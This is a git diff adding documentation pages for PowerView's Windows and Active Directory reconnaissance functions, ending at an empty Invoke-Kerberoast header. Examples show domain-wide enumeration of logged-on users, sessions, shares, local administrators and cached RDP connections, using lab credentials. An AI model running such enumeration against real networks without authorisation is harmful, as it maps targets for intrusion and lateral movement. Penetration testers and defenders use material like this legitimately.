@@ -0,0 +1,212 @@ +# Get-NetLocalGroupMember + +## SYNOPSIS +Enumerates members of a specific local group on the local (or remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Convert-ADName + +## SYNTAX + +``` +Get-NetLocalGroupMember [[-ComputerName] ] [-GroupName ] [-Method ] + [-Credential ] +``` + +## DESCRIPTION +This function will enumerate the members of a specified local group on the +current, or remote, machine. +By default, the Win32 API call NetLocalGroupGetMembers +will be used (for speed). +Specifying "-Method WinNT" causes the WinNT service provider +to be used instead, which returns a larger amount of information. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetLocalGroupMember | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... +S-1-5-21-25... +False False +WINDOWS1 Administrators WINDOWS1\lo... +S-1-5-21-25... +False False +WINDOWS1 Administrators TESTLAB\Dom... +S-1-5-21-89... +True True +WINDOWS1 Administrators TESTLAB\har... +S-1-5-21-89... +False True + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetLocalGroupMember -Method winnt | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... +S-1-5-21-25... +False False +WINDOWS1 Administrators WINDOWS1\lo... +S-1-5-21-25... +False False +WINDOWS1 Administrators TESTLAB\Dom... +S-1-5-21-89... +True True +WINDOWS1 Administrators TESTLAB\har... +S-1-5-21-89... 
+False True + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-NetLocalGroup | Get-NetLocalGroupMember | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... +S-1-5-21-25... +False False +WINDOWS1 Administrators WINDOWS1\lo... +S-1-5-21-25... +False False +WINDOWS1 Administrators TESTLAB\Dom... +S-1-5-21-89... +True True +WINDOWS1 Administrators TESTLAB\har... +S-1-5-21-89... +False True +WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25... +False False +WINDOWS1 IIS_IUSRS NT AUTHORIT... +S-1-5-17 False False +WINDOWS1 Users NT AUTHORIT... +S-1-5-4 False False +WINDOWS1 Users NT AUTHORIT... +S-1-5-11 False False +WINDOWS1 Users WINDOWS1\lo... +S-1-5-21-25... +False UNKNOWN +WINDOWS1 Users TESTLAB\Dom... +S-1-5-21-89... +True UNKNOWN + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +primary.tes... +Administrators TESTLAB\Adm... +S-1-5-21-89... +False False +primary.tes... +Administrators TESTLAB\loc... +S-1-5-21-89... +False False +primary.tes... +Administrators TESTLAB\Ent... +S-1-5-21-89... +True False +primary.tes... +Administrators TESTLAB\Dom... +S-1-5-21-89... +True False + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -GroupName +The local group name to query for users. +If not given, it defaults to "Administrators". 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -Method +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CollectionMethod + +Required: False +Position: Named +Default value: API +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to a remote machine. +Only applicable with "-Method WinNT". + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LocalGroupMember.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +## NOTES + +## RELATED LINKS + +[http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together +http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx](http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together +http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx) + diff --git a/docs/Recon/Get-NetLoggedon.md b/docs/Recon/Get-NetLoggedon.md new file mode 100755 index 0000000..024d1b2 --- /dev/null +++ b/docs/Recon/Get-NetLoggedon.md 
@@ -0,0 +1,100 @@ +# Get-NetLoggedon + +## SYNOPSIS +Returns users logged on the local (or a remote) machine. +Note: administrative rights needed for newer Windows OSes. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetLoggedon [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the NetWkstaUserEnum Win32API call to query +a given host for actively logged on users. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetLoggedon +``` + +Returns users actively logged onto the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetLoggedon -ComputerName sqlserver +``` + +Returns users actively logged onto the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-NetLoggedon +``` + +Returns all logged on users for all computers in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetLoggedon -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for logged on users (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LoggedOnUserInfo + +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + diff --git a/docs/Recon/Get-NetRDPSession.md b/docs/Recon/Get-NetRDPSession.md new file mode 100755 index 0000000..ff18322 --- /dev/null +++ b/docs/Recon/Get-NetRDPSession.md 
@@ -0,0 +1,104 @@ +# Get-NetRDPSession + +## SYNOPSIS +Returns remote desktop/session information for the local (or a remote) machine. + +Note: only members of the Administrators or Account Operators local group +can successfully execute this functionality on a remote target. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetRDPSession [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation +Win32API calls to query a given RDP remote service for active sessions and originating +IPs. +This is a replacement for qwinsta. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetRDPSession +``` + +Returns active RDP/terminal sessions on the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetRDPSession -ComputerName "sqlserver" +``` + +Returns active RDP/terminal sessions on the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainController | Get-NetRDPSession +``` + +Returns active RDP/terminal sessions on all domain controllers. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetRDPSession -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for active sessions (also accepts IP addresses). +Defaults to 'localhost'. 
+ +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.RDPSessionInfo + +A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure, +with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx) + diff --git a/docs/Recon/Get-NetSession.md b/docs/Recon/Get-NetSession.md new file mode 100755 index 0000000..d9e2f50 --- /dev/null +++ b/docs/Recon/Get-NetSession.md 
@@ -0,0 +1,99 @@ +# Get-NetSession + +## SYNOPSIS +Returns session information for the local (or a remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetSession [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the NetSessionEnum Win32API call to query +a given host for active sessions. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetSession +``` + +Returns active sessions on the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetSession -ComputerName sqlserver +``` + +Returns active sessions on the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainController | Get-NetSession +``` + +Returns active sessions on all domain controllers. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetSession -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.SessionInfo + +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the CName/UserName/Time/IdleTime for each session, with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + diff --git a/docs/Recon/Get-NetShare.md b/docs/Recon/Get-NetShare.md new file mode 100755 index 0000000..b3f2abe --- /dev/null +++ b/docs/Recon/Get-NetShare.md 
@@ -0,0 +1,100 @@ +# Get-NetShare + +## SYNOPSIS +Returns open shares on the local (or a remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetShare [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the NetShareEnum Win32API call to query +a given host for open shares. +This is a replacement for "net share \\\\hostname". + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetShare +``` + +Returns active shares on the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetShare -ComputerName sqlserver +``` + +Returns active shares on the 'sqlserver' host + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-NetShare +``` + +Returns all shares for all computers in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetShare -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for shares (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ShareInfo + +A PSCustomObject representing a SHARE_INFO_1 structure, including +the name/type/remark for each share, with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + diff --git a/docs/Recon/Get-PathAcl.md b/docs/Recon/Get-PathAcl.md new file mode 100755 index 0000000..448212f --- /dev/null +++ b/docs/Recon/Get-PathAcl.md 
@@ -0,0 +1,94 @@ +# Get-PathAcl + +## SYNOPSIS +Enumerates the ACL for a given file path. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID + +## SYNTAX + +``` +Get-PathAcl [-Path] [[-Credential] ] +``` + +## DESCRIPTION +Enumerates the ACL for a specified file/folder path, and translates +the access rules for each entry into readable formats. +If -Credential is passed, +Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-PathAcl "\\SERVER\Share\" +``` + +Returns ACLs for the given UNC share. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +gci .\test.txt | Get-PathAcl +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +Get-PathAcl -Path "\\\\SERVER\Share\" -Credential $Cred + +## PARAMETERS + +### -Path +Specifies the local or remote path to enumerate the ACLs for. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: FullName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target path. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +One of more paths to enumerate ACLs for. + +## OUTPUTS + +### PowerView.FileACL + +A custom object with the full path and associated ACL entries. 
+ +## NOTES + +## RELATED LINKS + +[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144) + diff --git a/docs/Recon/Get-RegLoggedOn.md b/docs/Recon/Get-RegLoggedOn.md new file mode 100755 index 0000000..2fd6e09 --- /dev/null +++ b/docs/Recon/Get-RegLoggedOn.md 
@@ -0,0 +1,89 @@ +# Get-RegLoggedOn + +## SYNOPSIS +Returns who is logged onto the local (or a remote) machine +through enumeration of remote registry keys. + +Note: This function requires only domain user rights on the +machine you're enumerating, but remote registry must be enabled. + +Author: Matt Kelly (@BreakersAll) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID + +## SYNTAX + +``` +Get-RegLoggedOn [[-ComputerName] ] +``` + +## DESCRIPTION +This function will query the HKU registry values to retrieve the local +logged on users SID and then attempt and reverse it. +Adapted technique from Sysinternal's PSLoggedOn script. +Benefit over +using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges +required (NetWkstaUserEnum requires remote admin access). + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegLoggedOn +``` + +Returns users actively logged onto the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-RegLoggedOn -ComputerName sqlserver +``` + +Returns users actively logged onto the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainController | Get-RegLoggedOn +``` + +Returns users actively logged on all domain controllers. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. 
+ +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.RegLoggedOnUser + +A PSCustomObject including the UserDomain/UserName/UserSID of each +actively logged on user, with the ComputerName added. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIProcess.md b/docs/Recon/Get-WMIProcess.md new file mode 100755 index 0000000..481dbb6 --- /dev/null +++ b/docs/Recon/Get-WMIProcess.md 
@@ -0,0 +1,80 @@ +# Get-WMIProcess + +## SYNOPSIS +Returns a list of processes and their owners on the local or remote machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WMIProcess [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine, +including the owners of the particular process. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIProcess -ComputerName WINDOWS1 +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for cached RDP connections (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.UserProcess + +A PSCustomObject containing the remote process information. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegCachedRDPConnection.md b/docs/Recon/Get-WMIRegCachedRDPConnection.md new file mode 100755 index 0000000..fe60228 --- /dev/null 
+++ b/docs/Recon/Get-WMIRegCachedRDPConnection.md 
@@ -0,0 +1,99 @@ +# Get-WMIRegCachedRDPConnection + +## SYNOPSIS +Returns information about RDP connections outgoing from the local (or remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertFrom-SID + +## SYNTAX + +``` +Get-WMIRegCachedRDPConnection [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Uses remote registry functionality to query all entries for the +"Windows Remote Desktop Connection Client" on a machine, separated by +user and target server. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegCachedRDPConnection +``` + +Returns the RDP connection client information for the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local +``` + +Returns the RDP connection client information for the WINDOWS2.testlab.local machine + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-WMIRegCachedRDPConnection +``` + +Returns cached RDP information for all machines in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for cached RDP connections (also accepts IP addresses). +Defaults to 'localhost'. 
+ +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.CachedRDPConnection + +A PSCustomObject containing the ComputerName and cached RDP information. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegLastLoggedOn.md b/docs/Recon/Get-WMIRegLastLoggedOn.md new file mode 100755 index 0000000..bed39e0 --- /dev/null +++ b/docs/Recon/Get-WMIRegLastLoggedOn.md 
@@ -0,0 +1,98 @@ +# Get-WMIRegLastLoggedOn + +## SYNOPSIS +Returns the last user who logged onto the local (or a remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WMIRegLastLoggedOn [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function uses remote registry to enumerate the LastLoggedOnUser registry key +for the local (or remote) machine. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegLastLoggedOn +``` + +Returns the last user logged onto the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-WMIRegLastLoggedOn -ComputerName WINDOWS1 +``` + +Returns the last user logged onto WINDOWS1 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-WMIRegLastLoggedOn +``` + +Returns the last user logged onto all machines in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LastLoggedOnUser + +A PSCustomObject containing the ComputerName and last loggedon user. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegMountedDrive.md b/docs/Recon/Get-WMIRegMountedDrive.md new file mode 100755 index 0000000..353bcf0 --- /dev/null +++ b/docs/Recon/Get-WMIRegMountedDrive.md 
@@ -0,0 +1,97 @@ +# Get-WMIRegMountedDrive + +## SYNOPSIS +Returns information about saved network mounted drives for the local (or remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertFrom-SID + +## SYNTAX + +``` +Get-WMIRegMountedDrive [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Uses remote registry functionality to enumerate recently mounted network drives. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegMountedDrive +``` + +Returns the saved network mounted drives for the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local +``` + +Returns the saved network mounted drives for the WINDOWS2.testlab.local machine + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-WMIRegMountedDrive +``` + +Returns the saved network mounted drives for all machines in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for mounted drive information (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.RegMountedDrive + +A PSCustomObject containing the ComputerName and mounted drive information. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegProxy.md b/docs/Recon/Get-WMIRegProxy.md new file mode 100755 index 0000000..b5fe966 --- /dev/null +++ b/docs/Recon/Get-WMIRegProxy.md 
@@ -0,0 +1,93 @@ +# Get-WMIRegProxy + +## SYNOPSIS +Enumerates the proxy server and WPAD conents for the current user. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WMIRegProxy [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Enumerates the proxy server and WPAD specification for the current user +on the local machine (default), or a machine specified with -ComputerName. +It does this by enumerating settings from +HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegProxy +``` + +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +WINDOWS1 http://primary.test... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$Cred = Get-Credential "TESTLAB\administrator" +``` + +Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local + +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +windows1.testlab.local primary.testlab.local + +## PARAMETERS + +### -ComputerName +Specifies the system to enumerate proxy settings on. +Defaults to the local host. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more computer name specification strings on the pipeline (netbios or FQDN). 
+ +## OUTPUTS + +### PowerView.ProxySettings + +Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Invoke-Kerberoast.md b/docs/Recon/Invoke-Kerberoast.md new file mode 100755 index 0000000..edfb89b --- /dev/null +++ b/docs/Recon/Invoke-Kerberoast.md 
